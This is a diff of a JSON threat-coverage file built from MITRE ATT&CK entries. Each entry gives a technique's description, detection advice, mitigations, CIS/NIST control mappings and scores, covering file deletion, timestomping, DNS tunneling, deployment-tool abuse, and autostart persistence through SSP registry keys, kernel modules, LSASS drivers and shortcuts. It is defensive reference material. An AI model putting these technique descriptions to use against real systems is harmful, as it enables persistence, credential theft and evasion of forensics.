-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    }
-                ]
-            },
+        "is_subtechnique": true,
+        "supertechnique": "T1547",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1070.004",
-                "name": "Indicator Removal on Host: File Deletion",
-                "url": "https://attack.mitre.org/techniques/T1070/004",
-                "description": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)",
-                "detection": "It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.",
-                "mitigations": []
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
             },
             {
-                "tid": "T1070.005",
-                "name": "Indicator Removal on Host: Network Share Connection Removal",
-                "url": "https://attack.mitre.org/techniques/T1070/005",
-                "description": "Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\\\system\\share /delete command. (Citation: Technet Net Use)",
-                "detection": "Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of net use commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.",
-                "mitigations": []
-            },
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.3238095238095238,
+        "adjusted_score": 0.3238095238095238,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.5",
+            "2.6",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "CM-7",
+            "IA-2",
+            "SI-10",
+            "SI-14",
+            "SI-16",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1547.005",
+        "name": "Boot or Logon Autostart Execution: Security Support Provider",
+        "description": "Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.\n\nThe SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)",
+        "url": "https://attack.mitre.org/techniques/T1547/005",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Module: Module Load",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1547",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1070.006",
-                "name": "Indicator Removal on Host: Timestomp",
-                "url": "https://attack.mitre.org/techniques/T1070/006",
-                "description": "Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.\n\nTimestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)",
-                "detection": "Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.",
-                "mitigations": []
+                "mid": "M1025",
+                "name": "Privileged Process Integrity",
+                "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.",
+                "url": "https://attack.mitre.org/mitigations/M1025"
             }
         ],
+        "cumulative_score": 0.18095238095238095,
+        "adjusted_score": 0.18095238095238095,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.6",
+            "4.1"
+        ],
+        "nist_controls": [
+            "CM-6",
+            "SC-39",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1547.006",
+        "name": "Boot or Logon Autostart Execution: Kernel Modules and Extensions",
+        "description": "Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) \n\nWhen used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)\n\nKernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation)\n\nAdversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)",
+        "url": "https://attack.mitre.org/techniques/T1547/006",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko (\"kernel object\") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)\n\nAdversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)\n\nOn macOS, monitor for execution of kextload commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)\n",
+        "platforms": [
+            "Linux",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Kernel: Kernel Module Load"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1547",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1041",
-                "name": "Encrypt Sensitive Information",
-                "description": "Protect sensitive information with strong encryption.",
-                "url": "https://attack.mitre.org/mitigations/M1041"
+                "mid": "M1049",
+                "name": "Antivirus/Antimalware",
+                "description": "Use signatures or heuristics to detect malicious software.",
+                "url": "https://attack.mitre.org/mitigations/M1049"
             },
             {
-                "mid": "M1029",
-                "name": "Remote Data Storage",
-                "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.",
-                "url": "https://attack.mitre.org/mitigations/M1029"
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
             },
             {
-                "mid": "M1022",
-                "name": "Restrict File and Directory Permissions",
-                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1022"
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
             }
         ],
-        "cumulative_score": 1.2960555400000002,
-        "adjusted_score": 1.2960555400000002,
+        "cumulative_score": 0.44285714285714284,
+        "adjusted_score": 0.44285714285714284,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": true,
         "cis_controls": [
-            "3.1",
-            "3.11",
-            "3.12",
-            "3.3",
-            "3.4",
+            "2.5",
+            "2.6",
             "4.1",
+            "4.7",
+            "5.3",
             "5.4",
             "6.1",
             "6.2",
             "6.8",
-            "8.1",
-            "8.2",
-            "8.3",
-            "8.9",
-            "12.8",
-            "3.10",
-            "8.10"
+            "10.1",
+            "10.2",
+            "10.7",
+            "13.2",
+            "13.7"
         ],
         "nist_controls": [
-            "AC-16",
-            "AC-17",
-            "AC-18",
-            "AC-19",
             "AC-2",
             "AC-3",
             "AC-5",
             "AC-6",
-            "CA-7",
-            "CM-2",
+            "CM-5",
             "CM-6",
-            "CP-6",
-            "CP-7",
-            "CP-9",
-            "SC-36",
-            "SC-4",
-            "SI-12",
-            "SI-23",
+            "CM-7",
+            "IA-2",
+            "IA-4",
+            "IA-8",
+            "RA-5",
+            "SI-10",
+            "SI-14",
+            "SI-16",
+            "SI-2",
             "SI-3",
             "SI-4",
             "SI-7"
         ],
         "process_coverage": true,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.6000000000000001,
-            "mitigation_score": 0.6909090909090909,
-            "detection_score": 0.5
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.59605554
+        "hardware_coverage": true
     },
     {
-        "tid": "T1071",
-        "name": "Application Layer Protocol",
-        "description": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. ",
-        "url": "https://attack.mitre.org/techniques/T1071",
+        "tid": "T1547.007",
+        "name": "Boot or Logon Autostart Execution: Re-opened Applications",
+        "description": "Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. \n\nAn adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).",
+        "url": "https://attack.mitre.org/techniques/T1547/007",
         "tactics": [
-            "Command And Control"
+            "Persistence",
+            "Privilege Escalation"
         ],
-        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)",
+        "detection": "Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.",
         "platforms": [
-            "Linux",
-            "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow"
+            "Command: Command Execution",
+            "File: File Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1071.001",
-                "name": "Application Layer Protocol: Web Protocols",
-                "url": "https://attack.mitre.org/techniques/T1071/001",
-                "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
-                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for web traffic to/from known-bad or suspicious domains. ",
-                "mitigations": [
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    }
-                ]
-            },
-            {
-                "tid": "T1071.002",
-                "name": "Application Layer Protocol: File Transfer Protocols",
-                "url": "https://attack.mitre.org/techniques/T1071/002",
-                "description": "Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as FTP, FTPS, and TFTP that transfer files may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
-                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.(Citation: University of Birmingham C2)",
-                "mitigations": [
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    }
-                ]
-            },
+        "is_subtechnique": true,
+        "supertechnique": "T1547",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1071.003",
-                "name": "Application Layer Protocol: Mail Protocols",
-                "url": "https://attack.mitre.org/techniques/T1071/003",
-                "description": "Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
-                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)",
-                "mitigations": [
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    }
-                ]
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
             },
             {
-                "tid": "T1071.004",
-                "name": "Application Layer Protocol: DNS",
-                "url": "https://attack.mitre.org/techniques/T1071/004",
-                "description": "Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nThe DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) ",
-                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for DNS traffic to/from known-bad or suspicious domains.",
-                "mitigations": [
-                    {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
-                    },
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    }
-                ]
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
             }
         ],
+        "cumulative_score": 0.28095238095238095,
+        "adjusted_score": 0.28095238095238095,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.3",
+            "4.1",
+            "4.8",
+            "7.7",
+            "14.3",
+            "14.4",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-3",
+            "CM-2",
+            "CM-3",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1547.008",
+        "name": "Boot or Logon Autostart Execution: LSASS Driver",
+        "description": "Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)\n\nAdversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.",
+        "url": "https://attack.mitre.org/techniques/T1547/008",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)\n\nUtilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA. ",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Driver: Driver Load",
+            "File: File Creation",
+            "File: File Modification",
+            "Module: Module Load"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1547",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
+                "mid": "M1043",
+                "name": "Credential Access Protection",
+                "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.",
+                "url": "https://attack.mitre.org/mitigations/M1043"
+            },
+            {
+                "mid": "M1025",
+                "name": "Privileged Process Integrity",
+                "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.",
+                "url": "https://attack.mitre.org/mitigations/M1025"
+            },
+            {
+                "mid": "M1044",
+                "name": "Restrict Library Loading",
+                "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.",
+                "url": "https://attack.mitre.org/mitigations/M1044"
             }
         ],
-        "cumulative_score": 0.7811056061904762,
-        "adjusted_score": 0.7811056061904762,
+        "cumulative_score": 0.19523809523809524,
+        "adjusted_score": 0.19523809523809524,
         "has_car": false,
-        "has_sigma": false,
+        "has_sigma": true,
         "has_es_siem": false,
         "has_splunk": true,
         "cis_controls": [
-            "13.3",
-            "13.8"
+            "2.6",
+            "4.1"
         ],
         "nist_controls": [
-            "AC-4",
-            "CA-7",
             "CM-2",
             "CM-6",
-            "CM-7",
-            "SC-10",
-            "SC-20",
-            "SC-21",
-            "SC-22",
-            "SC-23",
-            "SC-31",
-            "SC-37",
-            "SC-7",
+            "RA-5",
+            "SC-39",
             "SI-3",
-            "SI-4"
+            "SI-4",
+            "SI-7"
         ],
-        "process_coverage": false,
-        "network_coverage": true,
-        "file_coverage": false,
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.1761904761904762,
-            "mitigation_score": 0.3090909090909091,
-            "detection_score": 0.03
-        },
-        "choke_point_score": 0.5,
-        "prevalence_score": 0.10491513
+        "hardware_coverage": true
     },
     {
-        "tid": "T1072",
-        "name": "Software Deployment Tools",
-        "description": "Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).\n\nAccess to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.\n\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.",
-        "url": "https://attack.mitre.org/techniques/T1072",
+        "tid": "T1547.009",
+        "name": "Boot or Logon Autostart Execution: Shortcut Modification",
+        "description": "Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.\n\nAdversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.",
+        "url": "https://attack.mitre.org/techniques/T1547/009",
         "tactics": [
-            "Execution",
-            "Lateral Movement"
+            "Persistence",
+            "Privilege Escalation"
         ],
-        "detection": "Detection methods will vary depending on the type of third-party software or system and how it is typically used. \n\nThe same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. \n\nOften these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious. Monitor account login activity on these applications to detect suspicious/abnormal usage.\n\nPerform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.",
+        "detection": "Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.\n\nMonitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.(Citation: BSidesSLC 2020 - LNK Elastic)",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
+            "File: File Creation",
+            "File: File Modification",
             "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1547",
         "subtechniques": [],
         "mitigations": [
-            {
-                "mid": "M1015",
-                "name": "Active Directory Configuration",
-                "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
-                "url": "https://attack.mitre.org/mitigations/M1015"
-            },
-            {
-                "mid": "M1032",
-                "name": "Multi-factor Authentication",
-                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                "url": "https://attack.mitre.org/mitigations/M1032"
-            },
-            {
-                "mid": "M1030",
-                "name": "Network Segmentation",
-                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                "url": "https://attack.mitre.org/mitigations/M1030"
-            },
-            {
-                "mid": "M1027",
-                "name": "Password Policies",
-                "description": "Set and enforce secure password policies for accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1027"
-            },
-            {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
-            },
-            {
-                "mid": "M1029",
-                "name": "Remote Data Storage",
-                "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.",
-                "url": "https://attack.mitre.org/mitigations/M1029"
-            },
-            {
-                "mid": "M1051",
-                "name": "Update Software",
-                "description": "Perform regular software updates to mitigate exploitation risk.",
-                "url": "https://attack.mitre.org/mitigations/M1051"
-            },
             {
                 "mid": "M1018",
                 "name": "User Account Management",
                 "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
                 "url": "https://attack.mitre.org/mitigations/M1018"
-            },
-            {
-                "mid": "M1017",
-                "name": "User Training",
-                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                "url": "https://attack.mitre.org/mitigations/M1017"
             }
         ],
-        "cumulative_score": 0.8611737795238095,
-        "adjusted_score": 0.8611737795238095,
+        "cumulative_score": 0.26190476190476186,
+        "adjusted_score": 0.26190476190476186,
         "has_car": false,
-        "has_sigma": false,
-        "has_es_siem": true,
+        "has_sigma": true,
+        "has_es_siem": false,
         "has_splunk": false,
         "cis_controls": [
-            "3.12",
             "4.1",
-            "4.4",
             "4.7",
-            "5.1",
-            "5.2",
             "5.3",
             "5.4",
-            "5.5",
             "6.1",
             "6.2",
-            "6.4",
-            "6.5",
-            "6.8",
-            "7.1",
-            "7.2",
-            "7.3",
-            "7.4",
-            "7.5",
-            "12.2",
-            "12.8",
-            "14.9",
-            "15.7",
-            "16.1",
-            "16.8",
-            "16.9",
-            "18.3",
-            "18.5",
-            "16.10"
+            "6.8"
         ],
         "nist_controls": [
-            "AC-12",
+            "AC-17",
             "AC-2",
-            "AC-20",
             "AC-3",
-            "AC-4",
             "AC-5",
             "AC-6",
-            "CA-7",
-            "CM-2",
             "CM-5",
-            "CM-6",
-            "CM-7",
-            "CM-8",
             "IA-2",
-            "IA-5",
-            "SC-12",
-            "SC-17",
-            "SC-46",
-            "SC-7",
-            "SI-2",
-            "SI-23",
-            "SI-3",
